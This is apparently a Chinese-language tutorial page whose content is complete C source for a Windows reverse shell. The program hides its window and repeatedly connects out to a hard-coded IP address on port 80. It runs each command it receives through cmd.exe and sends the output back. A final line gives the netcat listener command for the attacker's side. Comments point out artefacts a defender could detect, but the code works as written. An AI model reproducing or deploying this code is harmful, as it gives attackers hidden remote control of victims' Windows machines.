
C語言通過匿名管道實現反彈式CMDShell


#pragma comment(lib,"ws2_32.lib")


#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>


int main(int argc,char **argv)
{
    // Entry point of the sample described on this page: a Windows reverse shell.
    // Flow, as written below: open an outbound TCP connection to the hard-coded
    // remote address and port, send a banner, then loop forever: receive bytes
    // from the remote side, run them through "cmd.exe /c" with stdout/stderr
    // redirected into an anonymous pipe, and relay the pipe contents back over
    // the socket.
    // Artefacts a defender can key on, all visible in this code: an outbound
    // connection to 59.110.167.239 on TCP port 80 retried every 5 s, the fixed
    // banner string sent immediately after connecting, and cmd.exe child
    // processes started with a hidden window and inherited pipe handles (the
    // linker pragma above additionally hides the parent's own console window).
    // argc/argv are unused.
    char *messages = "======================== Connect successful !========================\n";
    WSADATA WSAData;
    SOCKET sock;              // the outbound connection to the remote listener
    SOCKADDR_IN addr_in;
    char buf[1024];           // receive buffer for data arriving on the socket
    memset(buf,0,1024);       // cleared once, before the loop
    WSAStartup(MAKEWORD(2,2),&WSAData);   // initialise Winsock 2.2 (return value not checked)
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(80);           // remote listener port (hard-coded)
    addr_in.sin_addr.S_un.S_addr=inet_addr("59.110.167.239");   // remote listener IP (hard-coded)
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    // Beacon loop: keep retrying the outbound connection until it succeeds,
    // sleeping 5 s between attempts. Repeated connection attempts to the same
    // host:port at a fixed 5 s interval are the network-side signature of this stage.
    while (WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        Sleep(5000);
        continue;
    }
    send(sock,messages,strlen(messages),0);   // banner sent once, right after connecting
    char buffer[2048] = {0};                  // output read back from the pipe
    // Command loop. cmdline is zeroed at the end of every iteration; the only
    // way out is the exit(0) below, taken when recv() reports SOCKET_ERROR.
    for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
        // Anonymous pipe whose write end becomes the child's stdout/stderr;
        // bInheritHandle = TRUE so the child can inherit it.
        SECURITY_ATTRIBUTES sa;
        HANDLE hRead,hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;
        CreatePipe(&hRead,&hWrite,&sa,0);
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si);        // start from the current process's STARTUPINFO
        si.hStdError = hWrite;      // child's stderr -> pipe
        si.hStdOutput = hWrite;     // child's stdout -> pipe
        si.wShowWindow = SW_HIDE;   // child runs without a visible window
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        // Build "<system directory>//cmd.exe /c<received bytes>"; the separator
        // is written with forward slashes exactly as in the original.
        GetSystemDirectory(cmdline,MAX_PATH+1);
        strcat(cmdline,"//cmd.exe /c");
        int len=recv(sock,buf,1024,NULL);
        if(len==SOCKET_ERROR) exit(0);   // remote side gone: terminate the whole process
        strncat(cmdline,buf,strlen(buf)); // append the received bytes as the command text
        // Spawn cmd.exe with handle inheritance enabled; this parent -> cmd.exe
        // process-creation event is what a host sensor would record.
        CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
        CloseHandle(hWrite);   // parent drops its own copy of the pipe's write end
        // Relay pipe output to the socket until ReadFile fails. hRead,
        // pi.hProcess and pi.hThread are never closed, so every iteration
        // leaves additional handles open in this process.
        for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);
            memset(buffer,0,2048)){
            send(sock,buffer,strlen(buffer),0);
        }
    }
    return 0;
}

nc執行命令:nc命令 : -l -v -p [端口]

